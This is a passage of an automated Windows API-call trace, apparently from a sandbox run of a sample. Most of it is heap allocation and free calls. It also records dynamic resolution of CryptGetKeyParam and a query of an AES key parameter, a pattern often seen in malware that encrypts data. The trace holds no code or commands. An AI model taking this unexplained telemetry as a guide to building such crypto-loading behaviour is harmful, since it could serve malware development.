RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0115.337] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0115.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.337] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.338] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0115.339] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0115.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0115.339] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0115.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0115.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0115.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0115.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0115.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0115.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0115.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0115.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0115.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0115.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0115.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0115.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0115.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0115.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0115.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0115.342] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0115.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0115.343] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2900, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e2900*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.344] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.345] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 